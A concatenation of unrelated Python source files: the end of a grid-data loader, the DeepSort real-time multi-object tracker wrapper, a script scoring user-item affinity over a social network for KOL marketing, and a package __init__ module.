y_eval[..., :self.output_dim] = self.scaler.transform(y_eval[..., :self.output_dim])
x_test[..., :self.output_dim] = self.scaler.transform(x_test[..., :self.output_dim])
w_test[..., :self.output_dim] = self.scaler.transform(w_test[..., :self.output_dim])
y_test[..., :self.output_dim] = self.scaler.transform(y_test[..., :self.output_dim])
train_data = list(zip(x_train, w_train, y_train))
eval_data = list(zip(x_eval, w_eval, y_eval))
test_data = list(zip(x_test, w_test, y_test))
# 转Dataloader
self.train_dataloader, self.eval_dataloader, self.test_dataloader = \
generate_dataloader(train_data, eval_data, test_data, self.feature_name,
self.batch_size, self.num_workers, pad_with_last_sample=self.pad_with_last_sample)
self.num_batches = len(self.train_dataloader)
return self.train_dataloader, self.eval_dataloader, self.test_dataloader
def get_data_feature(self):
"""
返回数据集特征,scaler是归一化方法,adj_mx是邻接矩阵,num_nodes是网格的个数,
len_row是网格的行数,len_column是网格的列数,
feature_dim是输入数据的维度,output_dim是模型输出的维度
Returns:
dict: 包含数据集的相关特征的字典
"""
return {"scaler": self.scaler,
"num_nodes": self.num_nodes, "feature_dim": self.feature_dim, "ext_dim": self.ext_dim,
"output_dim": self.output_dim, "len_row": self.len_row, "len_column": self.len_column,
"num_batches": self.num_batches}
# (dataset-concatenation metadata row removed)
deep_sort_realtime/deepsort_tracker.py | dhalnon/deep_sort_realtime | 0 | 12762248 | import time
import logging
import cv2
import numpy as np
from deep_sort_realtime.deep_sort import nn_matching
from deep_sort_realtime.deep_sort.detection import Detection
from deep_sort_realtime.deep_sort.tracker import Tracker
from deep_sort_realtime.utils.nms import non_max_suppression
log_level = logging.DEBUG
default_logger = logging.getLogger('DeepSORT')
default_logger.setLevel(log_level)
handler = logging.StreamHandler()
handler.setLevel(log_level)
formatter = logging.Formatter('[%(levelname)s] [%(name)s] %(message)s')
handler.setFormatter(formatter)
default_logger.addHandler(handler)
class DeepSort(object):
    """High-level multi-object tracker: ties raw detections, an appearance
    embedder and the deep-sort ``Tracker`` together."""

    def __init__(self, max_age = 30, nms_max_overlap=1.0, max_cosine_distance=0.2, nn_budget=None, override_track_class=None, clock=None, embedder=True, half=True, bgr=True, logger=None, polygon=False):
        '''
        Parameters
        ----------
        max_age : Optional[int] = 30
            Maximum number of missed misses before a track is deleted.
        nms_max_overlap : Optional[float] = 1.0
            Non-maxima suppression threshold: Maximum detection overlap, if is 1.0, nms will be disabled
        max_cosine_distance : Optional[float] = 0.2
            Gating threshold for cosine distance
        nn_budget : Optional[int] = None
            Maximum size of the appearance descriptors, if None, no budget is enforced
        override_track_class : Optional[object] = None
            Giving this will override default Track class, this must inherit Track
        clock : Optional[object] = None
            Clock custom object provides date for track naming and facilitates track id reset every day, preventing overflow and overly large track ids. For example clock class, please see `utils/clock.py`
        embedder : Optional[bool] = True
            Whether to use in-built embedder or not. If False, then embeddings must be given during update
        half : Optional[bool] = True
            Whether to use half precision for deep embedder
        bgr : Optional[bool] = True
            Whether frame given to embedder is expected to be BGR or not (RGB)
        logger : Optional[object] = None
            logger object
        polygon: Optional[bool] = False
            Whether detections are polygons (e.g. oriented bounding boxes)
        '''
        # Fall back to the module-level logger when none is supplied.
        if logger is None:
            self.logger = default_logger
        else:
            self.logger = logger
        # self.video_info = video_info
        # assert clock is not None
        self.nms_max_overlap = nms_max_overlap
        metric = nn_matching.NearestNeighborDistanceMetric(
            "cosine", max_cosine_distance, nn_budget)
        self.tracker = Tracker(metric, max_age = max_age, override_track_class=override_track_class, clock=clock, logger=self.logger)
        if embedder:
            # Imported lazily so the torch-based embedder is only required when used.
            from deep_sort_realtime.embedder.embedder_pytorch import MobileNetv2_Embedder as Embedder
            self.embedder = Embedder(half=half, max_batch_size=16, bgr=bgr)
        else:
            self.embedder = None
        self.polygon = polygon
        # Echo the effective configuration for debugging.
        self.logger.info('DeepSort Tracker initialised')
        self.logger.info(f'- max age: {max_age}')
        self.logger.info(f'- appearance threshold: {max_cosine_distance}')
        self.logger.info(f'- nms threshold: {"OFF" if self.nms_max_overlap==1.0 else self.nms_max_overlap }')
        self.logger.info(f'- max num of appearance features: {nn_budget}')
        self.logger.info(f'- overriding track class : {"No" if override_track_class is None else "Yes"}' )
        self.logger.info(f'- clock : {"No" if clock is None else "Yes"}' )
        self.logger.info(f'- in-build embedder : {"No" if self.embedder is None else "Yes"}' )
        self.logger.info(f'- polygon detections : {"No" if polygon is False else "Yes"}' )

    def update_tracks(self, raw_detections, embeds=None, frame=None):
        """Run multi-target tracker on a particular sequence.

        Parameters
        ----------
        raw_detections (horizontal bb) : List[ Tuple[ List[float or int], float, str ] ]
            List of detections, each in tuples of ( [left,top,w,h] , confidence, detection_class)
        raw_detections (polygon) : List[ List[float], List[int or str], List[float] ]
            List of Polygons, Classes, Confidences. All 3 sublists of the same length. A polygon defined as a ndarray-like [x1,y1,x2,y2,...].
        embeds : Optional[ List[] ] = None
            List of appearance features corresponding to detections
        frame : Optional [ np.ndarray ] = None
            if embeds not given, Image frame must be given here, in [H,W,C].

        Returns
        -------
        list of track objects (Look into track.py for more info or see "main" section below in this script to see simple example)
        """
        # Embeddings must either be supplied or be computable from the frame.
        if embeds is None:
            if self.embedder is None:
                raise Exception('Embedder not created during init so embeddings must be given now!')
            if frame is None:
                raise Exception('either embeddings or frame must be given!')
        if not self.polygon:
            # Drop degenerate boxes with non-positive width or height.
            raw_detections = [ d for d in raw_detections if d[0][2] > 0 and d[0][3] > 0]
            if embeds is None:
                embeds = self.generate_embeds(frame, raw_detections)
            # Proper deep sort detection objects that consist of bbox, confidence and embedding.
            detections = self.create_detections(raw_detections, embeds)
        else:
            polygons, bounding_rects = self.process_polygons(raw_detections[0])
            if embeds is None:
                embeds = self.generate_embeds_poly(frame, polygons, bounding_rects)
            # Proper deep sort detection objects that consist of bbox, confidence and embedding.
            detections = self.create_detections_poly(raw_detections, embeds, bounding_rects)
        # Run non-maxima suppression (skipped entirely when threshold is 1.0).
        boxes = np.array([d.ltwh for d in detections])
        scores = np.array([d.confidence for d in detections])
        if self.nms_max_overlap < 1.0:
            # nms_tic = time.perf_counter()
            indices = non_max_suppression(
                boxes, self.nms_max_overlap, scores)
            # nms_toc = time.perf_counter()
            # logger.debug(f'nms time: {nms_toc-nms_tic}s')
            detections = [detections[i] for i in indices]
        # Update tracker: predict motion, then associate the new detections.
        self.tracker.predict()
        self.tracker.update(detections)
        return self.tracker.tracks

    def refresh_track_ids(self):
        # NOTE(review): this bare attribute access has no effect; presumably it
        # was meant to reset ``self.tracker._next_id`` — confirm intended behaviour.
        self.tracker._next_id

    def generate_embeds(self, frame, raw_dets):
        # Crop each detection box out of the frame and embed the crops.
        crops = self.crop_bb(frame, raw_dets)
        return self.embedder.predict(crops)

    def generate_embeds_poly(self, frame, polygons, bounding_rects):
        # Mask-and-crop each polygon (black padding) and embed the crops.
        crops = self.crop_poly_pad_black(frame, polygons, bounding_rects)
        return self.embedder.predict(crops)

    def create_detections(self, raw_dets, embeds):
        # Pair each raw detection with its embedding.
        detection_list = []
        for raw_det, embed in zip(raw_dets,embeds):
            detection_list.append(Detection(raw_det[0], raw_det[1], embed, class_name=raw_det[2])) #raw_det = [bbox, conf_score, class]
        return detection_list

    def create_detections_poly(self, dets, embeds, bounding_rects):
        detection_list = []
        # NOTE(review): extends the caller's list in place — ``dets`` (the
        # caller's raw_detections) gains the embeds and bounding rects.
        dets.extend([embeds, bounding_rects])
        for raw_polygon, cl, score, embed, bounding_rect in zip(*dets):
            x,y,w,h = bounding_rect
            # Clamp the top-left corner to the image; polygon kept as "others".
            x = max(0, x)
            y = max(0, y)
            bbox = [x,y,w,h]
            detection_list.append(Detection(bbox, score, embed, class_name=cl, others=raw_polygon))
        return detection_list

    @staticmethod
    def process_polygons(raw_polygons):
        # Group flat [x1,y1,x2,y2,...] lists into (x, y) pairs and compute
        # the axis-aligned bounding rect of each polygon.
        polygons = [ [ polygon[x:x+2] for x in range(0, len(polygon), 2) ]for polygon in raw_polygons ]
        bounding_rects = [ cv2.boundingRect(np.array([polygon]).astype(int)) for polygon in polygons ]
        return polygons, bounding_rects

    @staticmethod
    def crop_bb(frame, raw_dets):
        # Crop every detection box, clamping coordinates to the frame bounds.
        crops = []
        im_height, im_width = frame.shape[:2]
        for detection in raw_dets:
            l,t,w,h = [int(x) for x in detection[0]]
            r = l + w
            b = t + h
            crop_l = max(0, l)
            crop_r = min(im_width, r)
            crop_t = max(0, t)
            crop_b = min(im_height, b)
            crops.append(frame[crop_t:crop_b, crop_l:crop_r])
        return crops

    @staticmethod
    def crop_poly_pad_black(frame, polygons, bounding_rects):
        # For each polygon: black out everything outside it, then crop its
        # (clamped) bounding rect out of the masked frame.
        masked_polys = []
        im_height, im_width = frame.shape[:2]
        for polygon, bounding_rect in zip(polygons, bounding_rects):
            mask = np.zeros(frame.shape, dtype=np.uint8)
            polygon_mask = np.array([polygon]).astype(int)
            cv2.fillPoly(mask, polygon_mask, color=(255,255,255))

            # apply the mask
            masked_image = cv2.bitwise_and(frame, mask)

            # crop masked image
            x,y,w,h = bounding_rect
            crop_l = max(0, x)
            crop_r = min(im_width, x+w)
            crop_t = max(0, y)
            crop_b = min(im_height, y+h)
            cropped = masked_image[crop_t:crop_b, crop_l:crop_r].copy()
            masked_polys.append(np.array(cropped))
        return masked_polys
# (dataset-concatenation metadata row removed)
data_preprocessing/generate_user_relation_network.py | wangleye/KOL_marketing | 0 | 12762249 | import pymysql
conn = pymysql.connect(host='127.0.0.1',
user='root',
passwd='<PASSWORD>',
db='all0504')
def get_user_set():
    """Collect the union of all audience user ids listed in the KOL_audience file.

    Each non-empty line is ``<kol>;<id1 id2 ...>``; the space-separated ids in
    the second field are accumulated into one set.
    """
    users = set()
    with open('../facebook/KOL_audience') as audience_file:
        for raw_line in audience_file:
            record = raw_line.strip()
            if not record:
                continue
            fields = record.split(';')
            users |= set(fields[1].split(' '))
    return users
def get_item_set(num=100):
    """Read at most ``num`` item ids (first token per non-empty line) from the
    scenario list file; reads the module global ``SCENARIO``."""
    items = set()
    seen = 0
    with open('../facebook/{}_list'.format(SCENARIO)) as item_file:
        for raw_line in item_file:
            record = raw_line.strip()
            if not record:
                continue
            seen += 1
            items.add(record.split()[0])
            if seen == num:
                break
    return items
def read_user_item_preference(user_set):
    """Load each user's liked items from the DB.

    An empty ``user_set`` keeps every user. Returns a (user -> set of item
    ids) mapping plus the set of user ids actually kept.
    """
    preferences = {}
    cursor = conn.cursor()
    cursor.execute("SELECT iduser, {}str FROM user".format(SCENARIO))
    for user_id, items_str in cursor.fetchall():
        if len(user_set) == 0 or user_id in user_set:
            preferences[user_id] = set(items_str.split(';'))
    return preferences, set(preferences.keys())
def read_user_relationship(user_set):
    """Load the friend lists (from the DB) for every user in ``user_set``.

    Returns a (user -> set of friend ids) mapping; users without a DB row
    keep an empty set.
    """
    relationships = {user: set() for user in user_set}
    cursor = conn.cursor()
    cursor.execute("SELECT iduser, friendstr FROM user")
    for user_id, friend_str in cursor.fetchall():
        if user_id not in user_set:
            continue
        relationships[user_id].update(friend_str.split(';'))
    return relationships
def read_item_similarity_from_file():
    """Parse the precomputed pairwise item-similarity file into a nested dict.

    Each non-empty line is ``<item1> <item2> <similarity>``; the result maps
    item1 -> {item2 -> float}. Reads the module global ``SCENARIO``.
    """
    similarities = {}
    with open("../facebook/{}_similarity".format(SCENARIO)) as sim_file:
        for raw_line in sim_file:
            record = raw_line.strip()
            if not record:
                continue
            tokens = record.split()
            similarities.setdefault(tokens[0], {})[tokens[1]] = float(tokens[2])
    return similarities
def calculate_user_similairity(user1, user2):
    """Directed similarity of ``user1`` towards ``user2``: number of co-liked
    items divided by the size of user2's like set (+1 smoothing).

    Reads the module global ``USER_PREF``; unknown users score 0.
    """
    if user1 not in USER_PREF or user2 not in USER_PREF:
        return 0
    shared = USER_PREF[user1] & USER_PREF[user2]
    if not shared:
        return 0
    return len(shared) * 1.0 / (len(USER_PREF[user2]) + 1)
def get_item_similarity(item1, item2):
    """Look up the precomputed similarity of two items (module global
    ``ITEM_SIM``); missing pairs count as 0."""
    return ITEM_SIM.get(item1, {}).get(item2, 0)
def user_item_affinity(user_id, target_item, consider_item=True, consider_friend=True, indirect_friend=False, inindirect_friend=False):
    """Score how likely ``user_id`` is to like ``target_item``.

    Combines (a) similarity between the target item and the user's liked
    items and (b) similarity to friends — optionally friends-of-friends and
    3-hop friends — who already like the target item. Reads the module
    globals ITEM_SET, USER_PREF and USER_RELATION. ``indirect_friend``
    enables 2-hop friends; ``inindirect_friend`` enables 3-hop friends.
    """
    score = 0
    # Item-based component: sum similarity of the target to every liked item.
    for item in ITEM_SET:
        if item in USER_PREF[user_id]:
            score += get_item_similarity(target_item, item)
    if score == 0:
        return 0  # early stop the users with no item similarity (if continued, too slow for the algorithm)
    if not consider_item:
        score = 0.0001  # discard the item signal but keep a tiny positive base score
    considered_f = set()
    if consider_friend:
        for friend in USER_RELATION[user_id]:
            # Direct (1-hop) friends who like the target item.
            if friend in USER_PREF and target_item in USER_PREF[friend]:
                score += calculate_user_similairity(user_id, friend)
                considered_f.add(friend)
            # if counting indirect (2-hop) friends; considered_f prevents double counting
            if indirect_friend and (friend in USER_RELATION):
                friends_of_f = USER_RELATION[friend]
                for friend_of_f in friends_of_f:
                    if (friend_of_f in USER_PREF) and (friend_of_f not in considered_f) and target_item in USER_PREF[friend_of_f]:
                        # score += calculate_user_similairity(user_id, friend) * calculate_user_similairity(friend, friend_of_f)
                        score += calculate_user_similairity(user_id, friend_of_f)
                        considered_f.add(friend_of_f)
                        # if counting in-indirect (3-hop) friends
                        if inindirect_friend and (friend_of_f in USER_RELATION):
                            for fff in USER_RELATION[friend_of_f]:
                                if (fff in USER_PREF) and (fff not in considered_f) and target_item in USER_PREF[fff]:
                                    # score += calculate_user_similairity(user_id, friend) * calculate_user_similairity(friend, friend_of_f) * calculate_user_similairity(friend_of_f, fff)
                                    score += calculate_user_similairity(user_id, fff)
                                    considered_f.add(fff)
    return score
def output_user_item_aff():
    """Write affinity scores using BOTH item and friend signals for every
    known user/item pair with a positive score."""
    out_path = "user_{}_aff_score_100_both".format(SCENARIO)
    with open(out_path, "w") as out:
        out.write('user {} score truth\n'.format(SCENARIO))
        for user in USER_SET:
            if user not in USER_PREF:
                continue
            liked = USER_PREF[user]
            for item in ITEM_SET:
                score = user_item_affinity(user, item, consider_item=True, consider_friend=True)
                if score > 0:
                    out.write('{} {} {} {}\n'.format(user, item, score, int(item in liked)))
def output_user_item_aff_only_item():
    """Write affinity scores using ONLY the item-similarity signal."""
    out_path = "user_{}_aff_score_100_only_item".format(SCENARIO)
    with open(out_path, "w") as out:
        out.write('user {} score truth\n'.format(SCENARIO))
        for user in USER_SET:
            if user not in USER_PREF:
                continue
            liked = USER_PREF[user]
            for item in ITEM_SET:
                score = user_item_affinity(user, item, consider_item=True, consider_friend=False)
                if score > 0:
                    out.write('{} {} {} {}\n'.format(user, item, score, int(item in liked)))
def output_user_item_aff_only_friend():
    """Write affinity scores using ONLY the friend signal (item signal is
    reduced to a tiny base score inside user_item_affinity)."""
    out_path = "user_{}_aff_score_100_only_friend".format(SCENARIO)
    with open(out_path, "w") as out:
        out.write('user {} score truth\n'.format(SCENARIO))
        for user in USER_SET:
            if user not in USER_PREF:
                continue
            liked = USER_PREF[user]
            for item in ITEM_SET:
                score = user_item_affinity(user, item, consider_item=False, consider_friend=True)
                if score > 0:
                    out.write('{} {} {} {}\n'.format(user, item, score, int(item in liked)))
if __name__ == '__main__':
    # Globals consumed by the functions above: the item domain, the user/item
    # universe, preferences, the friendship graph and the similarity table.
    SCENARIO = 'book'
    print('reading user set...')
    USER_SET = get_user_set()
    print('reading item set...')
    ITEM_SET = get_item_set()
    print('reading user preference...')
    # USER_SET is narrowed to the users that actually have preference rows.
    USER_PREF, USER_SET = read_user_item_preference(USER_SET)
    print(len(USER_PREF.keys()))
    print('reading user relationship...')
    USER_RELATION = read_user_relationship(USER_SET)
    print('reading item similarity...')
    ITEM_SIM = read_item_similarity_from_file()
    print('outputing to file...')
    output_user_item_aff()
    # Alternative single-signal outputs (enable as needed):
    #output_user_item_aff_only_item()
    #output_user_item_aff_only_friend()
# (dataset-concatenation metadata row removed)
src/compas_tia/__init__.py | KIKI007/compas_tia | 0 | 12762250 | <reponame>KIKI007/compas_tia
"""
********************************************************************************
compas_tia
********************************************************************************
.. currentmodule:: compas_tia
.. toctree::
:maxdepth: 1
"""
from __future__ import print_function
import os
__author__ = ["<NAME>"]
__copyright__ = "Ziqi Wang"
__license__ = "MIT License"
__email__ = "<EMAIL>"
__version__ = "0.1.0"
HERE = os.path.dirname(__file__)
HOME = os.path.abspath(os.path.join(HERE, "../../"))
DATA = os.path.abspath(os.path.join(HOME, "data"))
DOCS = os.path.abspath(os.path.join(HOME, "docs"))
TEMP = os.path.abspath(os.path.join(HOME, "temp"))
from ._tia_datastructure import * # noqa: F401 F403
__all__ = [name for name in dir() if not name.startswith('_')]
| 1.6875 | 2 |